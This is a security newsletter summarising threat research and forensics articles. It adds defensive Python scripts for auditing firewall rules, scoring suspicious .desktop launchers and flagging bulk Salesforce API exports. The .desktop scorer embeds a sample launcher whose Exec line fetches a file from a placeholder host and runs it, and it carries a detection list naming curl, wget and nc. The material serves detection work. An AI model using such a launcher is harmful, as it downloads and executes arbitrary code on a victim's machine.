Monthly summary of interesting articles, reports and tools for tech experts, covering both offensive and defensive topics.
🔴 Red Team
📝 Beyond the Horizon: Uncovering Hosts and Services Behind Misconfigured Firewalls
This study explores the risks of poorly configured stateless firewalls that allow inbound packets whenever their source port matches a port permitted by an outbound rule, so the firewall treats them as replies without checking that any connection exists. A 2014 vulnerability of this kind impacted Microsoft and Apple, prompting the researchers to scan the IPv4 space a decade later. They discovered nearly 2.5 million newly reachable services on over 2 million previously hidden IP addresses, frequently exhibiting a weak security posture: outdated systems, weak encryption, and known vulnerabilities.
To evaluate exploitation by attackers, the researchers deployed honeypots behind stateless firewalls. Results show this technique is seldom used today, but it is poised to regain popularity. The study underscores the need to review firewall rules, apply patches, and strengthen authentication, and notes that its exclusion of IPv6 leaves open future risks for devices behind NATs and stateless firewalls.
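The rule pattern the study describes is easy to audit for on a Linux host. The script below is an added example (not code from the study or from Thinkst): it parses `iptables-save` output and flags ACCEPT rules in the INPUT chain that match on a source port without also requiring an ESTABLISHED conntrack state, and offers the stateful rewrite. The ruleset it runs on is constructed for the demo.

```python
"""Audit iptables-save output for 'source-port trust' rules.

Added example, not from the paper or Thinkst. A rule such as
  -A INPUT -p udp --sport 53 -j ACCEPT
lets any packet whose *source* port is 53 in, whether or not this host
ever sent a query: that is the stateless pattern the study scanned for.
The fix is to tie the rule to connection state.
"""
import re
import shlex

# Constructed iptables-save excerpt (not from any real host).
SAMPLE_RULES = """\
*filter
:INPUT DROP [0:0]
:FORWARD DROP [0:0]
:OUTPUT ACCEPT [0:0]
-A INPUT -i lo -j ACCEPT
-A INPUT -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT
-A INPUT -p tcp --dport 22 -j ACCEPT
-A INPUT -p udp --sport 53 -j ACCEPT
-A INPUT -p tcp --sport 80 -j ACCEPT
-A INPUT -p tcp --sport 443 -m state --state ESTABLISHED -j ACCEPT
-A INPUT -p tcp -m tcp --sport 20 -j ACCEPT
COMMIT
"""

# Either the conntrack or the legacy state match makes the rule stateful.
STATE_MATCH = re.compile(r"--(ctstate|state)\s+\S*ESTABLISHED")


def parse_rules(text):
    """Yield (chain, tokens) for every '-A' rule line in iptables-save output."""
    for line in text.splitlines():
        line = line.strip()
        if not line.startswith("-A "):
            continue
        tokens = shlex.split(line)
        yield tokens[1], tokens


def source_port_of(tokens):
    """Return the value after --sport/--source-port, or None if the rule has none."""
    for i, tok in enumerate(tokens):
        if tok in ("--sport", "--source-port") and i + 1 < len(tokens):
            return tokens[i + 1]
    return None


def target_of(tokens):
    """Return the jump target (-j value), or None."""
    if "-j" in tokens and tokens.index("-j") + 1 < len(tokens):
        return tokens[tokens.index("-j") + 1]
    return None


def find_stateless_sport_rules(text, chain="INPUT"):
    """Return rule lines in `chain` that ACCEPT on a source-port match alone."""
    findings = []
    for rule_chain, tokens in parse_rules(text):
        if rule_chain != chain or target_of(tokens) != "ACCEPT":
            continue
        if source_port_of(tokens) is None:
            continue
        if STATE_MATCH.search(" ".join(tokens)):
            continue  # stateful: only replies to connections this host opened
        findings.append(" ".join(tokens))
    return findings


def harden(rule):
    """Suggested rewrite: keep the port match, but only for reply traffic."""
    return rule.replace(" -j ACCEPT", " -m conntrack --ctstate ESTABLISHED -j ACCEPT")


if __name__ == "__main__":
    for rule in find_stateless_sport_rules(SAMPLE_RULES):
        print("STATELESS:", rule)
        print("  suggest :", harden(rule))
```

On a real host, feed it `iptables-save` (or `ip6tables-save`, which the study did not cover) instead of the sample text; with conntrack in place the generic RELATED,ESTABLISHED rule already admits replies, so the flagged source-port rules can usually be deleted rather than rewritten.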
📌 Source: Thinkst Scapes Q2 https://thinkst.com/ts/
📝 APT36: Targets Indian BOSS Linux Systems with Weaponized AutoStart Files
CYFIRMA’s article outlines a cyber-espionage campaign by APT36 (Transparent Tribe) that targets the Indian government and various sectors. The attack employs phishing emails containing malicious ".desktop" files that, when opened on BOSS Linux, download custom payloads, leveraging BOSS’s auto-start feature for persistent access. CYFIRMA emphasizes that this demonstrates APT36’s increasing sophistication. Recommendations include enhancing phishing awareness, filtering ".desktop" attachments, and implementing BOSS-specific defenses.
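A mail gateway or endpoint agent that follows the "filter .desktop attachments" advice needs to decide what makes a launcher suspicious. The following is an added example (not code from CYFIRMA and not derived from the campaign's samples): it parses XDG .desktop entries and scores the Exec= line for traits of a download-and-run launcher, and checks whether a path sits in a standard XDG autostart directory. The two entries and the indicator lists are constructed heuristics of my own.

```python
"""Triage .desktop files for download-and-run launchers.

Added example, not from the CYFIRMA report. A .desktop file is an INI-style
text file; the Exec= key is a command line the desktop will run. Traits worth
scoring: an inline shell (-c), a network fetch tool, chmod/base64 staging, a
document-like Name that disguises the launcher, and hiding from menus.
"""
import configparser
import posixpath
import re

# Constructed samples (not from the campaign).
BENIGN = """\
[Desktop Entry]
Type=Application
Name=Text Editor
Exec=gedit %U
Icon=accessories-text-editor
Terminal=false
"""

SUSPICIOUS = """\
[Desktop Entry]
Type=Application
Name=Invoice_July.pdf
Icon=application-pdf
Exec=bash -c "curl -fsSL http://example.invalid/p -o /tmp/.u && chmod +x /tmp/.u && /tmp/.u"
Terminal=false
NoDisplay=true
"""

INLINE_SHELL = re.compile(r"\b(sh|bash|dash|zsh|python3?|perl)\b\s+-c\b")
FETCHERS = {"curl", "wget", "ftp", "nc"}
DOCUMENT_EXT = re.compile(r"\.(pdf|docx?|xlsx?|pptx?|txt)$", re.I)
# Standard XDG autostart locations (assumption: BOSS, being GNOME/Debian based,
# honours them; the summary does not name the exact path the campaign used).
AUTOSTART_DIRS = ("~/.config/autostart", "/etc/xdg/autostart")


def parse_desktop(text):
    """Return the [Desktop Entry] section as a dict, preserving key case."""
    cp = configparser.ConfigParser(interpolation=None, delimiters=("=",))
    cp.optionxform = str  # keep 'Exec', not 'exec'
    cp.read_string(text)
    return dict(cp["Desktop Entry"]) if cp.has_section("Desktop Entry") else {}


def score_entry(entry):
    """Return (score, reasons) for one parsed Desktop Entry; 0 means nothing odd."""
    reasons = []
    exec_line = entry.get("Exec", "")
    tokens = set(re.findall(r"[A-Za-z0-9_]+", exec_line))
    if INLINE_SHELL.search(exec_line):
        reasons.append("inline shell command (-c) in Exec")
    if tokens & FETCHERS:
        reasons.append("network download tool in Exec")
    if "chmod" in tokens or "base64" in tokens:
        reasons.append("chmod/base64 staging in Exec")
    if DOCUMENT_EXT.search(entry.get("Name", "")):
        reasons.append("document-style Name on an Application entry")
    if entry.get("NoDisplay", "").lower() == "true" or entry.get("Hidden", "").lower() == "true":
        reasons.append("hidden from menus")
    return len(reasons), reasons


def in_autostart_dir(path):
    """True if `path` lies directly inside an XDG autostart directory."""
    parent = posixpath.dirname(path)
    return any(parent in (d, posixpath.expanduser(d)) for d in AUTOSTART_DIRS)


if __name__ == "__main__":
    for label, text in (("benign", BENIGN), ("suspicious", SUSPICIOUS)):
        score, reasons = score_entry(parse_desktop(text))
        print(f"{label}: score={score} {reasons}")
    print(in_autostart_dir("~/.config/autostart/update.desktop"))
```

A gateway would quarantine any mail-borne .desktop outright (there is no business reason to e-mail a launcher); on the endpoint, the same scoring run over the autostart directories gives a cheap periodic persistence check.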
📝 Storm-0501’s evolving techniques lead to cloud-based ransomware
The Microsoft article outlines the evolution of techniques used by Storm-0501, which has transitioned from traditional ransomware to cloud-based attacks. Storm-0501 effectively exploits cloud capabilities to exfiltrate data, destroy backups, and extort victims without deploying malware. Their strategy leverages compromised hybrid identities to escalate privileges to global administrator rights. Once in the cloud, they utilize AzureHound to map resources, bypass protections, and delete critical data while encrypting the remainder. These attacks take advantage of gaps between local and cloud environments, particularly when security solutions fail to cover all endpoints.
To defend against these threats, Microsoft strongly recommends strengthening cloud identity security, protecting Azure resources, and actively monitoring for suspicious activities. The article emphasizes the necessity of adopting a zero trust approach and correcting default configurations.
🔵 Blue Team
📝 A Primer on Forensic Investigation of Salesforce Security Incidents
The article outlines how to conduct a forensic investigation into Salesforce security incidents using three essential elements: logs, permissions, and backups. It emphasizes the importance of analyzing logs with tools like Event Monitoring to detect anomalies, particularly suspicious API activity. In cases of data exfiltration, log details and Field History Tracking are crucial for reconstructing incidents. Automating responses with Transaction Security Policies (TSP) significantly enhances security by blocking risky actions. Proactive preparation, including monitoring, permission management, and backups, is essential to limit incident impact and accelerate resolution.
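What "suspicious API activity" looks like in Event Monitoring data is a volume-and-novelty question. The script below is an added example, not from the Salesforce article: it reads a constructed CSV shaped like a simplified EventLogFile API export (the column names used exist in that event type; the rows, IDs, addresses and thresholds are made up), builds a per-user baseline from earlier days, and raises alerts for a user who pulls far more rows of an entity than before, touches a sensitive entity for the first time, or calls the API from an address never seen in the baseline.

```python
"""Flag bulk-export style API activity in Salesforce Event Monitoring logs.

Added example, not from the Salesforce article. Baseline = all days before
`target_day`; rule set (thresholds are assumptions for the demo):
  volume     daily ROWS_PROCESSED for an entity > BASELINE_FACTOR x prior daily max
  new_entity first-ever access to a sensitive entity
  new_ip     calls from a CLIENT_IP absent from the user's baseline
  new_user   no prior activity at all, so nothing to compare against
"""
import csv
import io
from collections import defaultdict

# Constructed, simplified EventLogFile 'API' rows (real exports carry many more columns).
SAMPLE_LOG = """\
EVENT_TYPE,TIMESTAMP_DERIVED,USER_ID,CLIENT_IP,API_TYPE,ENTITY_NAME,METHOD_NAME,ROWS_PROCESSED
API,2025-07-01T09:12:04.000Z,005XX0000012ABC,203.0.113.10,SOAP,Account,query,120
API,2025-07-01T14:03:11.000Z,005XX0000012ABC,203.0.113.10,SOAP,Contact,query,300
API,2025-07-02T10:41:55.000Z,005XX0000012ABC,203.0.113.10,SOAP,Account,query,90
API,2025-07-02T11:05:02.000Z,005XX0000012ABC,203.0.113.10,SOAP,Contact,query,250
API,2025-07-03T02:17:30.000Z,005XX0000012ABC,198.51.100.77,Bulk,Contact,query,48000
API,2025-07-03T02:19:44.000Z,005XX0000012ABC,198.51.100.77,Bulk,Lead,query,32000
API,2025-07-03T09:00:00.000Z,005XX0000099XYZ,203.0.113.11,REST,Account,query,40
"""

BASELINE_FACTOR = 10
SENSITIVE = {"Account", "Contact", "Lead", "Opportunity"}


def load_rows(text):
    return list(csv.DictReader(io.StringIO(text)))


def daily_totals(rows):
    """Return {(user, day, entity): summed ROWS_PROCESSED} over API events."""
    totals = defaultdict(int)
    for r in rows:
        if r["EVENT_TYPE"] != "API":
            continue
        day = r["TIMESTAMP_DERIVED"][:10]  # ISO timestamp, date prefix
        totals[(r["USER_ID"], day, r["ENTITY_NAME"])] += int(r["ROWS_PROCESSED"] or 0)
    return totals


def find_anomalies(rows, target_day):
    """Return a list of (user, kind, detail) alerts for `target_day`."""
    totals = daily_totals(rows)
    baseline, known_ips = defaultdict(int), defaultdict(set)
    for (user, day, entity), n in totals.items():
        if day < target_day:
            baseline[(user, entity)] = max(baseline[(user, entity)], n)
    for r in rows:
        if r["TIMESTAMP_DERIVED"][:10] < target_day:
            known_ips[r["USER_ID"]].add(r["CLIENT_IP"])

    alerts, seen = [], set()
    for (user, day, entity), n in sorted(totals.items()):
        if day != target_day:
            continue
        if user not in known_ips:  # brand-new API user: nothing to baseline against
            if (user, "new_user") not in seen:
                seen.add((user, "new_user"))
                alerts.append((user, "new_user", "no prior API activity to baseline against"))
            continue
        base = baseline.get((user, entity), 0)
        if base and n > BASELINE_FACTOR * base:
            alerts.append((user, "volume", f"{entity}: {n} rows vs prior daily max {base}"))
        elif not base and entity in SENSITIVE:
            alerts.append((user, "new_entity", f"{entity}: first access, {n} rows"))
    for r in rows:
        user, ip = r["USER_ID"], r["CLIENT_IP"]
        if (r["TIMESTAMP_DERIVED"][:10] == target_day and user in known_ips
                and ip not in known_ips[user] and (user, ip) not in seen):
            seen.add((user, ip))
            alerts.append((user, "new_ip", f"API calls from unseen address {ip}"))
    return alerts


def run_sample():
    return find_anomalies(load_rows(SAMPLE_LOG), "2025-07-03")


if __name__ == "__main__":
    for user, kind, detail in run_sample():
        print(f"{user}  {kind:<10} {detail}")
```

The same per-user, per-entity totals are what you would later hand to the TSP rules the article recommends (for example, an ApiEvent policy on row counts), so the detection written here for hindsight doubles as the tuning data for the automated block.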
📌 Source: https://www.salesforce.com/blog/a-primer-on-forensic-investigation-of-salesforce-security-incidents/
🛠️ Thorium Platform Public Availability
CISA, in collaboration with Sandia National Laboratories, has launched Thorium, an open-source platform for automated large-scale file analysis. This platform empowers cybersecurity teams to automate workflows by integrating commercial, open-source, or custom tools for malware analysis, digital forensics, and incident response. Thorium delivers scalability (over 10 million files per hour), rapid search performance, and features like result tagging and full-text search. Users can define event triggers and control the platform through a RESTful API.
CISA strongly encourages teams to adopt Thorium to enhance analysis capabilities and provide valuable feedback. The platform is available on GitHub with comprehensive resources for deployment and use.
📌 Source: https://www.cisa.gov/news-events/alerts/2025/07/31/thorium-platform-public-availability
📝 RDP Forensics Part 1: Fingerprinting Attacks with Keyboard Layout Data
The article explains how keyboard input data from the Remote Desktop Protocol (RDP) can be used to profile an attacker. By analyzing the client’s "local input", investigators can find the corresponding keys in the remote system’s registry and determine whether the setting was introduced during the RDP connection or was already present. The author presents scenarios where an attacker uses a keyboard layout that is not installed on the target, revealing the client’s language in the Windows event log and providing geographical clues. If the layout is already available under the user profile, distinguishing legitimate local input from remote provenance becomes harder. The article also highlights the method’s limitations and proposes best practices to enhance RDP forensic investigations.
Never trust, always check